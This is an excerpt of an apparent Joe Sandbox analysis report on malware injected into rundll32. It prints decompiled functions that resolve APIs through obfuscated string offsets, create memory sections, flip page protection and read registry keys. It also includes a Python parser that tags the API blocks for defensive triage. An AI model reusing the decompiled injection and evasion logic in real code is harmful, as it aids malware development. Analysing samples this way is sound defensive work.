                                                          • Opcode ID: 59bc8f774a2bcc148ca9810179254782311ca470b4509b81737408b847729f1b
                                                          • Instruction ID: 9864ae3dbdd9f9bb173f94e9cc3a30088ce73f34774330c94bca7cc4fb4f485b
                                                          • Opcode Fuzzy Hash: 59bc8f774a2bcc148ca9810179254782311ca470b4509b81737408b847729f1b
                                                          • Instruction Fuzzy Hash: C7315D72900609AFDF01DFA8C845A9FB7B6BF48315F144825ED10FB261DB71AE49CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,?,?,?,05598570,00000018,0557672A,?,?,?), ref: 05593448
                                                          • VirtualProtect.KERNEL32(00000000,00000004,?,?,?,?,?,?,?,?,05598570,00000018,0557672A,?,?,?), ref: 055934D3
                                                          • RtlEnterCriticalSection.NTDLL(0559C300), ref: 055934FB
                                                          • RtlLeaveCriticalSection.NTDLL(0559C300), ref: 05593519
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection$EnterErrorLastLeaveProtectVirtual
                                                          • String ID:
                                                          • API String ID: 3666628472-0
                                                          • Opcode ID: a9d62800ac50624fcacf93320525a00139bb55710a97a98dbf6fc7c32e4aeb04
                                                          • Instruction ID: a078b9fd799c26f75e26a1c2fb6e9822944f8dc38c8c484706e560471c467b3f
                                                          • Opcode Fuzzy Hash: a9d62800ac50624fcacf93320525a00139bb55710a97a98dbf6fc7c32e4aeb04
                                                          • Instruction Fuzzy Hash: 55415B70A00609EFCF15DFA5D8889ADBBF5FF48341B11892AE416E7210D778EA44CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • GetModuleHandleA.KERNEL32(?,00000020,00000000,0557D41D,?,?,?,?,05573905,?,?,00000000,00000000,75145520), ref: 055747E6
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 05574808
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0557481E
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 05574834
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0557484A
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 05574860
                                                            • Part of subcall function 0558B878: NtCreateSection.NTDLL(00000000,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000), ref: 0558B8D5
                                                            • Part of subcall function 0558B878: memset.NTDLL ref: 0558B8F9
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                                                          • String ID:
                                                          • API String ID: 3012371009-0
                                                          • Opcode ID: a57f862e9096c2efa106d8d159da6660abca2fd3323865b5e32352d2c61f94a4
                                                          • Instruction ID: d2f94d438d0529ecc707be8e275300814d5f9848c2a8af84220a3041326a4f9d
                                                          • Opcode Fuzzy Hash: a57f862e9096c2efa106d8d159da6660abca2fd3323865b5e32352d2c61f94a4
                                                          • Instruction Fuzzy Hash: 792151B1A1030EEFDB20DFA9DC45E6A7BECFB04244B01456AF505D7201E778E9049F60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00E56ACC(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                          				intOrPtr _v8;
                                                          				intOrPtr _t23;
                                                          				intOrPtr _t26;
                                                          				_Unknown_base(*)()* _t28;
                                                          				intOrPtr _t30;
                                                          				_Unknown_base(*)()* _t32;
                                                          				intOrPtr _t33;
                                                          				_Unknown_base(*)()* _t35;
                                                          				intOrPtr _t36;
                                                          				_Unknown_base(*)()* _t38;
                                                          				intOrPtr _t39;
                                                          				_Unknown_base(*)()* _t41;
                                                          				intOrPtr _t44;
                                                          				struct HINSTANCE__* _t48;
                                                          				intOrPtr _t54;
                                                          
                                                          				_t54 = E00E55FBC(0x20);
                                                          				if(_t54 == 0) {
                                                          					_v8 = 8;
                                                          				} else {
                                                          					_t23 =  *0xe5a2d4; // 0x435d5a8
                                                          					_t1 = _t23 + 0xe5b11a; // 0x4c44544e
                                                          					_t48 = GetModuleHandleA(_t1);
                                                          					_t26 =  *0xe5a2d4; // 0x435d5a8
                                                          					_t2 = _t26 + 0xe5b787; // 0x7243775a
                                                          					_v8 = 0x7f;
                                                          					_t28 = GetProcAddress(_t48, _t2);
                                                          					 *(_t54 + 0xc) = _t28;
                                                          					if(_t28 == 0) {
                                                          						L8:
                                                          						E00E513CC(_t54);
                                                          					} else {
                                                          						_t30 =  *0xe5a2d4; // 0x435d5a8
                                                          						_t5 = _t30 + 0xe5b774; // 0x614d775a
                                                          						_t32 = GetProcAddress(_t48, _t5);
                                                          						 *(_t54 + 0x10) = _t32;
                                                          						if(_t32 == 0) {
                                                          							goto L8;
                                                          						} else {
                                                          							_t33 =  *0xe5a2d4; // 0x435d5a8
                                                          							_t7 = _t33 + 0xe5b797; // 0x6e55775a
                                                          							_t35 = GetProcAddress(_t48, _t7);
                                                          							 *(_t54 + 0x14) = _t35;
                                                          							if(_t35 == 0) {
                                                          								goto L8;
                                                          							} else {
                                                          								_t36 =  *0xe5a2d4; // 0x435d5a8
                                                          								_t9 = _t36 + 0xe5b756; // 0x4e6c7452
                                                          								_t38 = GetProcAddress(_t48, _t9);
                                                          								 *(_t54 + 0x18) = _t38;
                                                          								if(_t38 == 0) {
                                                          									goto L8;
                                                          								} else {
                                                          									_t39 =  *0xe5a2d4; // 0x435d5a8
                                                          									_t11 = _t39 + 0xe5b7ac; // 0x6c43775a
                                                          									_t41 = GetProcAddress(_t48, _t11);
                                                          									 *(_t54 + 0x1c) = _t41;
                                                          									if(_t41 == 0) {
                                                          										goto L8;
                                                          									} else {
                                                          										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                                          										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                                          										_t44 = E00E56EB3(_t54, _a8); // executed
                                                          										_v8 = _t44;
                                                          										if(_t44 != 0) {
                                                          											goto L8;
                                                          										} else {
                                                          											 *_a12 = _t54;
                                                          										}
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				return _v8;
                                                          			}

                                                          Instruction addresses of the decompiled lines above (0x00000000 marks a goto with no own instruction):
                                                          0x00e56adb, 0x00e56adf, 0x00e56ba1, 0x00e56ae5, 0x00e56ae5, 0x00e56aea, 0x00e56afd, 0x00e56aff, 0x00e56b04, 0x00e56b0c,
                                                          0x00e56b13, 0x00e56b17, 0x00e56b1a, 0x00e56b99, 0x00e56b9a, 0x00e56b1c, 0x00e56b1c, 0x00e56b21, 0x00e56b29, 0x00e56b2d,
                                                          0x00e56b30, 0x00000000, 0x00e56b32, 0x00e56b32, 0x00e56b37, 0x00e56b3f, 0x00e56b43, 0x00e56b46, 0x00000000, 0x00e56b48,
                                                          0x00e56b48, 0x00e56b4d, 0x00e56b55, 0x00e56b59, 0x00e56b5c, 0x00000000, 0x00e56b5e, 0x00e56b5e, 0x00e56b63, 0x00e56b6b,
                                                          0x00e56b6f, 0x00e56b72, 0x00000000, 0x00e56b74, 0x00e56b7a, 0x00e56b7f, 0x00e56b86, 0x00e56b8d, 0x00e56b90, 0x00000000,
                                                          0x00e56b92, 0x00e56b95, 0x00e56b95, 0x00e56b90, 0x00e56b72, 0x00e56b5c, 0x00e56b46, 0x00e56b30, 0x00e56b1a, 0x00e56baf

                                                          APIs
                                                            • Part of subcall function 00E55FBC: RtlAllocateHeap.NTDLL(00000000,00000000,00E52035), ref: 00E55FC8
                                                          • GetModuleHandleA.KERNEL32(4C44544E,00000020,00000001,00000000,00000000,?,?,?,00E52F2E,?,?,?,?,00000000,00000000), ref: 00E56AF1
                                                          • GetProcAddress.KERNEL32(00000000,7243775A), ref: 00E56B13
                                                          • GetProcAddress.KERNEL32(00000000,614D775A), ref: 00E56B29
                                                          • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00E56B3F
                                                          • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00E56B55
                                                          • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00E56B6B
                                                            • Part of subcall function 00E56EB3: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000,00E56B8B), ref: 00E56F10
                                                            • Part of subcall function 00E56EB3: memset.NTDLL ref: 00E56F32
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                                                          • String ID:
                                                          • API String ID: 3012371009-0
                                                          • Opcode ID: 958fd570112ec55126b7fdbb0785a825b63e66bf207949ec2785c6ebdea1d140
                                                          • Instruction ID: 6c3192b3f48bd3ecc1587827f2e0e8eac8a63969cb72efb71299088bdbdb35d3
                                                          • Opcode Fuzzy Hash: 958fd570112ec55126b7fdbb0785a825b63e66bf207949ec2785c6ebdea1d140
                                                          • Instruction Fuzzy Hash: 2E2174B1600306DFD790DFAADC45E6A77ECEB48346B045D6AF909E7211D734ED098B60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateThread.KERNEL32(00000000,00000000,00000000,05572D6E,00000000,0558EB74), ref: 05579C8E
                                                          • QueueUserAPC.KERNEL32(05572D6E,00000000,05571AE4,?,?,05572D6E,05571AE4,00000000,?), ref: 05579CA3
                                                          • GetLastError.KERNEL32(00000000,?,?,05572D6E,05571AE4,00000000,?), ref: 05579CAE
                                                          • TerminateThread.KERNEL32(00000000,00000000,?,?,05572D6E,05571AE4,00000000,?), ref: 05579CB8
                                                          • CloseHandle.KERNEL32(00000000,?,?,05572D6E,05571AE4,00000000,?), ref: 05579CBF
                                                          • SetLastError.KERNEL32(00000000,?,?,05572D6E,05571AE4,00000000,?), ref: 05579CC8
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                                          • String ID:
                                                          • API String ID: 3832013932-0
                                                          • Opcode ID: eb589d563490e566e28f302b2f12384f4c205a6b0f397bbe1cfbff46ddcdbddb
                                                          • Instruction ID: 754c8d8c455ee7552d23f76f584007926b8439232321749201ecb05f7efeceec
                                                          • Opcode Fuzzy Hash: eb589d563490e566e28f302b2f12384f4c205a6b0f397bbe1cfbff46ddcdbddb
                                                          • Instruction Fuzzy Hash: 6AF0A732615220BBDB221F60AC4AF5FBFADFF09741F020406F60690150CF39981CBBA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 41%
                                                          			E00E574CB(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                                          				intOrPtr _v12;
                                                          				void* _v16;
                                                          				void* _v28;
                                                          				char _v32;
                                                          				void* __esi;
                                                          				void* _t20;
                                                          				void* _t26;
                                                          				void* _t29;
                                                          				void* _t38;
                                                          				signed int* _t39;
                                                          				void* _t40;
                                                          
                                                          				_t36 = __ecx;
                                                          				_v32 = 0;
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				_v12 = _a4;
                                                          				_t20 = E00E57770(__ecx,  &_v32); // executed
                                                          				_t38 = _t20;
                                                          				if(_t38 != 0) {
                                                          					L12:
                                                          					_t39 = _a8;
                                                          					L13:
                                                          					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                                          						_t23 =  &(_t39[1]);
                                                          						if(_t39[1] != 0) {
                                                          							E00E53625(_t23);
                                                          						}
                                                          					}
                                                          					return _t38;
                                                          				}
                                                          				_t26 = E00E5249F(0x40,  &_v16); // executed
                                                          				if(_t26 != 0) {
                                                          					_v16 = 0;
                                                          				}
                                                          				_t40 = CreateEventA(0xe5a2f8, 1, 0,  *0xe5a394);
                                                          				if(_t40 != 0) {
                                                          					SetEvent(_t40);
                                                          					Sleep(0xbb8); // executed
                                                          					CloseHandle(_t40);
                                                          				}
                                                          				_push( &_v32);
                                                          				if(_a12 == 0) {
                                                          					_t29 = E00E53D85(_t36); // executed
                                                          				} else {
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0);
                                                          					_t29 = E00E55448(_t36);
                                                          				}
                                                          				_t41 = _v16;
                                                          				_t38 = _t29;
                                                          				if(_v16 != 0) {
                                                          					E00E5243E(_t41);
                                                          				}
                                                          				if(_t38 != 0) {
                                                          					goto L12;
                                                          				} else {
                                                          					_t39 = _a8;
                                                          					_t38 = E00E54BAC( &_v32, _t39);
                                                          					goto L13;
                                                          				}
                                                          			}














                                                          Instruction addresses for the listing above (decompiler line map, 0x00e574cb .. 0x00e5759f; address column spilled from the source view).

                                                          APIs
                                                          • CreateEventA.KERNEL32(00E5A2F8,00000001,00000000,00000040,?,?,7519F710,00000000,7519F730,?,?,?,yE,00E5519C,?,?), ref: 00E5751C
                                                          • SetEvent.KERNEL32(00000000,?,?,?,yE,00E5519C,?,?,yE,00000002,?,?,yE), ref: 00E57529
                                                          • Sleep.KERNEL32(00000BB8,?,?,?,yE,00E5519C,?,?,yE,00000002,?,?,yE), ref: 00E57534
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,yE,00E5519C,?,?,yE,00000002,?,?,yE), ref: 00E5753B
                                                            • Part of subcall function 00E53D85: RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,00E5755B,?), ref: 00E53DAB
                                                            • Part of subcall function 00E53D85: RegEnumKeyExA.KERNEL32(?,?,?,00E5755B,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,00E5755B), ref: 00E53DF2
                                                            • Part of subcall function 00E53D85: WaitForSingleObject.KERNEL32(00000000,?,?,?,00E5755B,?,00E5755B,?,?,?,?,?,00E5755B,?), ref: 00E53E5F
                                                            • Part of subcall function 00E53D85: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,00E5755B,?,?,?,?,yE,00E5519C,?), ref: 00E53E87
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CloseEvent$CreateEnumHandleObjectOpenSingleSleepWait
                                                          • String ID: yE
                                                          • API String ID: 891522397-3927521143
                                                          • Opcode ID: 52a15a9b914f7e270208aa45db2ff4daca10464b2be032579c0ee01a31959e25
                                                          • Instruction ID: 765a833b2cdbf08727d29e6371bedf833797b87e334677c0c519f277ce6afce0
                                                          • Opcode Fuzzy Hash: 52a15a9b914f7e270208aa45db2ff4daca10464b2be032579c0ee01a31959e25
                                                          • Instruction Fuzzy Hash: D621C572D04215ABCB20AFE5A8858EE73B9AB44356F055C29FE51B7140E730DD4CC7A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 055783D0: RegCreateKeyA.ADVAPI32(80000001,059BA7F0,059BB184), ref: 055783E5
                                                            • Part of subcall function 055783D0: lstrlen.KERNEL32(059BA7F0,00000000,00000000,0559B072,?,?,?,05581876,00000001,00000000,059BB184), ref: 0557840E
                                                          • RegQueryValueExA.KERNEL32(00000000,055729E6,00000000,055729E6,00000000,?,?,00000000,00000000,?,?,055729E6,055729E6,?,05588593,?), ref: 055750FF
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05575113
                                                          • RegQueryValueExA.ADVAPI32(00000000,055729E6,00000000,055729E6,00000000,?,?,00000000,00000000,?,?,055729E6,055729E6,?,05588593,?), ref: 0557512D
                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,00000000,?,?,055729E6,055729E6,?,05588593,?,055729E6,00000000), ref: 05575149
                                                          • RegCloseKey.ADVAPI32(00000000,?,00000000,00000000,?,?,055729E6,055729E6,?,05588593,?,055729E6,00000000), ref: 05575157
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: HeapQueryValue$AllocateCloseCreateFreelstrlen
                                                          • String ID:
                                                          • API String ID: 1633053242-0
                                                          • Opcode ID: 0eb2fc661bdf2b5f4b46bd62f6d9c96dbe1994e6dda2922e671e7200a8f0aa48
                                                          • Instruction ID: cfd1faf5ac7d2b3d8849fb0854633bb3fe95c2cd5f15a09f735e205ed70d831a
                                                          • Opcode Fuzzy Hash: 0eb2fc661bdf2b5f4b46bd62f6d9c96dbe1994e6dda2922e671e7200a8f0aa48
                                                          • Instruction Fuzzy Hash: 5D1179B251010DFFDF019F95EC85CAE7F7EFB88264B120426F60197210EA719D58AB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • VirtualProtect.KERNEL32(?,?,00000040,?), ref: 05576264
                                                          • GetLastError.KERNEL32 ref: 0557626C
                                                          • VirtualQuery.KERNEL32(?,?,0000001C), ref: 05576283
                                                          • VirtualProtect.KERNEL32(?,?,-2C9B417C,?), ref: 055762A8
                                                          • SetLastError.KERNEL32(?), ref: 055762B1
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Virtual$ErrorLastProtect$Query
                                                          • String ID:
                                                          • API String ID: 148356745-0
                                                          • Opcode ID: 38dacca31639ecaa9d30f6db50da428f288eef6cfc8ca20aa2da674771faadb8
                                                          • Instruction ID: a0c201ad7fb78448b17d9f8d6533eb8bc9ea988df206aed3d212213204efa027
                                                          • Opcode Fuzzy Hash: 38dacca31639ecaa9d30f6db50da428f288eef6cfc8ca20aa2da674771faadb8
                                                          • Instruction Fuzzy Hash: CB01E57650020DFF9F11AF95DC45CAABBB9FB08251B014026F946D3120EBB1DA29ABA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%
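The three blocks above each list, per recovered function, the APIs called from the function body (with call-site address), the calls made inside its subroutines, the memory dump the function was lifted from and an instruction fuzzy hash. When pivoting across samples it is more useful to have those fields as data than as report text. The parser and tagger below is an added example written for this page, not Joe Sandbox code; the sample input is the three blocks above copied from this report and trimmed, and the tags produced by classify() are heuristics assumed for illustration, not the sandbox's own signatures.

```python
# Parses the "APIs" function blocks of a Joe Sandbox report text into records and
# tags each block with small heuristics. Added example, not Joe Sandbox code; the
# heuristics are illustrative assumptions, not the sandbox's signatures.
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Matches one API line, with or without an argument list or a "Part of subcall" prefix.
API_RE = re.compile(
    r"^•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
PAGE_EXECUTE_READWRITE = 0x40  # winnt.h

@dataclass
class Call:
    api: str
    module: str
    ref: int                    # call-site address
    args: List[str]             # argument tokens as printed ("?" = unknown)
    subcall_of: Optional[int]   # callee address if the call sits inside a subroutine

@dataclass
class FunctionBlock:
    calls: List[Call] = field(default_factory=list)
    source: str = ""
    based_on_pe: Optional[bool] = None
    fuzzy_hash: str = ""

    def direct_calls(self) -> List[Call]:
        """Calls made by the function body itself, in address order."""
        return sorted((c for c in self.calls if c.subcall_of is None), key=lambda c: c.ref)

def parse_blocks(text: str) -> List[FunctionBlock]:
    blocks, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":                          # header that opens a function block
            cur = FunctionBlock()
            blocks.append(cur)
        elif cur is None:
            continue
        elif m := API_RE.match(line):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            sub = int(m["sub"], 16) if m["sub"] else None
            cur.calls.append(Call(m["api"], m["mod"], int(m["ref"], 16), args, sub))
        elif line.startswith("• Source File:"):
            cur.source = line.split(":", 1)[1].strip()
            cur.based_on_pe = "based on PE: true" in line
        elif line.startswith("• Instruction Fuzzy Hash:"):
            cur.fuzzy_hash = line.split(":", 1)[1].strip()
        elif line.startswith("Uniqueness Score"):   # footer that closes the block
            cur = None
    return blocks

def _hexarg(tok: str) -> Optional[int]:
    try:
        return int(tok, 16)
    except ValueError:          # "?" or string fragments such as "yE"
        return None

def classify(block: FunctionBlock) -> List[str]:
    """Heuristic tags over the call sequence (assumptions chosen for this example)."""
    tags, direct = [], block.direct_calls()
    names = [c.api for c in direct]
    vp = [c for c in direct if c.api == "VirtualProtect"]
    if len(vp) >= 2 and "VirtualQuery" in names:      # flip protection, act, restore
        tags.append("page-protection toggle")
        if any(len(c.args) > 2 and _hexarg(c.args[2]) == PAGE_EXECUTE_READWRITE for c in vp):
            tags.append("PAGE_EXECUTE_READWRITE requested")
    if "RegQueryValueExA" in names and "RtlAllocateHeap" in names:
        tags.append("registry value read into heap buffer")
    if any(c.api == "RegEnumKeyExA" for c in block.calls):
        tags.append("registry key enumeration (via subcall)")
    return tags

# Sample input: the three blocks from this report, copied and trimmed.
SAMPLE_REPORT = """\
APIs
• CreateEventA.KERNEL32(00E5A2F8,00000001,00000000,00000040,?,?,7519F710,00000000,7519F730,?,?,?,yE,00E5519C,?,?), ref: 00E5751C
• SetEvent.KERNEL32(00000000,?,?,?,yE,00E5519C,?,?,yE,00000002,?,?,yE), ref: 00E57529
• Sleep.KERNEL32(00000BB8,?,?,?,yE,00E5519C,?,?,yE,00000002,?,?,yE), ref: 00E57534
• CloseHandle.KERNEL32(00000000,?,?,?,yE,00E5519C,?,?,yE,00000002,?,?,yE), ref: 00E5753B
  • Part of subcall function 00E53D85: RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,00E5755B,?), ref: 00E53DAB
  • Part of subcall function 00E53D85: RegEnumKeyExA.KERNEL32(?,?,?,00E5755B,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,00E5755B), ref: 00E53DF2
Memory Dump Source
• Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
• Instruction Fuzzy Hash: D621C572D04215ABCB20AFE5A8858EE73B9AB44356F055C29FE51B7140E730DD4CC7A0
Uniqueness Score: -1.00%
APIs
  • Part of subcall function 055783D0: RegCreateKeyA.ADVAPI32(80000001,059BA7F0,059BB184), ref: 055783E5
• RegQueryValueExA.KERNEL32(00000000,055729E6,00000000,055729E6,00000000,?,?,00000000,00000000,?,?,055729E6,055729E6,?,05588593,?), ref: 055750FF
• RtlAllocateHeap.NTDLL(00000000,?), ref: 05575113
• HeapFree.KERNEL32(00000000,?,?,00000000,00000000,?,?,055729E6,055729E6,?,05588593,?,055729E6,00000000), ref: 05575149
• RegCloseKey.ADVAPI32(00000000,?,00000000,00000000,?,?,055729E6,055729E6,?,05588593,?,055729E6,00000000), ref: 05575157
Memory Dump Source
• Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
• Instruction Fuzzy Hash: 5D1179B251010DFFDF019F95EC85CAE7F7EFB88264B120426F60197210EA719D58AB60
Uniqueness Score: -1.00%
APIs
• VirtualProtect.KERNEL32(?,?,00000040,?), ref: 05576264
• GetLastError.KERNEL32 ref: 0557626C
• VirtualQuery.KERNEL32(?,?,0000001C), ref: 05576283
• VirtualProtect.KERNEL32(?,?,-2C9B417C,?), ref: 055762A8
• SetLastError.KERNEL32(?), ref: 055762B1
Memory Dump Source
• Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
• Instruction Fuzzy Hash: CB01E57650020DFF9F11AF95DC45CAABBB9FB08251B014026F946D3120EBB1DA29ABA0
Uniqueness Score: -1.00%
"""

if __name__ == "__main__":
    for b in parse_blocks(SAMPLE_REPORT):
        print(b.source.split(",")[0], [c.api for c in b.direct_calls()], classify(b))
```

Direct calls are ordered by call-site address, so the third block comes out as VirtualProtect, GetLastError, VirtualQuery, VirtualProtect, SetLastError with 0x40 (PAGE_EXECUTE_READWRITE) in the first call, which is the flip-act-restore shape one expects from code that patches an executable page in place. The "Part of subcall function" lines are kept but attributed to the callee address, so they do not pollute the sequence of the function itself; note that the 0x05570000 dump is flagged "based on PE: false", i.e. it is an injected region with no image header, which is why the imports in that region show up with resolved names only through the sandbox's own hooking.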

                                                          C-Code - Quality: 94%
                                                          			E00E55242(intOrPtr* __eax, void* __ecx, void* __edx, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
                                                          				char _v8;
                                                          				char _v48;
                                                          				void* __edi;
                                                          				intOrPtr _t22;
                                                          				long _t29;
                                                          				intOrPtr _t33;
                                                          				intOrPtr* _t41;
                                                          				void* _t42;
                                                          				void* _t46;
                                                          				intOrPtr* _t47;
                                                          				void* _t48;
                                                          				intOrPtr _t50;
                                                          
                                                          				_t46 = __edx;
                                                          				_t42 = __ecx;
                                                          				_t41 = _a16;
                                                          				_t47 = __eax;
                                                          				_t22 =  *0xe5a2d4; // 0x435d5a8
                                                          				_t2 = _t22 + 0xe5b671; // 0x657a6973 = ASCII "size" (little-endian): first bytes of the wsprintfA format string
                                                          				wsprintfA( &_v48, _t2,  *__eax,  *_t41);
                                                          				if( *0xe5a2a4 >= 5) {
                                                          					_push( &_a16);
                                                          					_t10 =  &_v8; // 0xe5517b
                                                          					_push( &_v48);
                                                          					_t29 = _a4;
                                                          					"QQSUVWh"(); // decompiler artefact: unresolved indirect call; the "name" is the target's prologue bytes (51 51 53 55 56 57 68 = push ecx, ecx, ebx, ebp, esi, edi, push imm32)
                                                          					L5:
                                                          					_a4 = _t29;
                                                          					L6:
                                                          					if(_a4 != 0) {
                                                          						L9:
                                                          						 *0xe5a2a4 =  *0xe5a2a4 + 1;
                                                          						L10:
                                                          						return _a4;
                                                          					}
                                                          					_t49 = _a16;
                                                          					 *_t47 = _a16;
                                                          					_t16 =  &_v8; // 0xe5517b
                                                          					_t48 =  *_t16;
                                                          					 *_t41 = E00E556BF(_t49, _t48); // executed
                                                          					_t33 = E00E56997(_t48, _t49); // executed
                                                          					if(_t33 != 0) {
                                                          						 *_a8 = _t48;
                                                          						 *_a12 = _t33;
                                                          						if( *0xe5a2a4 < 5) {
                                                          							 *0xe5a2a4 =  *0xe5a2a4 & 0x00000000;
                                                          						}
                                                          						goto L10;
                                                          					}
                                                          				_a4 = 0xbf; // 191 = ERROR_INVALID_EXE_SIGNATURE (winerror.h): E00E56997 returned 0 for the received buffer
                                                          					E00E53546();
                                                          					HeapFree( *0xe5a290, 0, _t48);
                                                          					goto L9;
                                                          				}
                                                          				_t50 =  *0xe5a390; // 0x51b8d6c
                                                          				if(RtlAllocateHeap( *0xe5a290, 0, 0x800) == 0) { // 0x800-byte work buffer; the decompiler dropped the result variable (it is the _t36 passed to E00E5254C below)
                                                          					_a4 = 8; // ERROR_NOT_ENOUGH_MEMORY
                                                          					goto L6;
                                                          				}
                                                          				_t5 =  &_v8; // 0xe5517b
                                                          				_t29 = E00E5254C(_a4, _t42, _t46, _t50,  &_v48, _t5,  &_a16, _t36);
                                                          				goto L5;
                                                          			}

                                                          Instruction addresses for the listing above (decompiler line map, 0x00e55242 .. 0x00e5532c; address column spilled from the source view).

                                                          APIs
                                                          • wsprintfA.USER32 ref: 00E55264
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00E55289
                                                            • Part of subcall function 00E5254C: GetTickCount.KERNEL32 ref: 00E52563
                                                            • Part of subcall function 00E5254C: wsprintfA.USER32 ref: 00E525B0
                                                            • Part of subcall function 00E5254C: wsprintfA.USER32 ref: 00E525CD
                                                            • Part of subcall function 00E5254C: wsprintfA.USER32 ref: 00E525ED
                                                            • Part of subcall function 00E5254C: wsprintfA.USER32 ref: 00E5260B
                                                            • Part of subcall function 00E5254C: wsprintfA.USER32 ref: 00E5262E
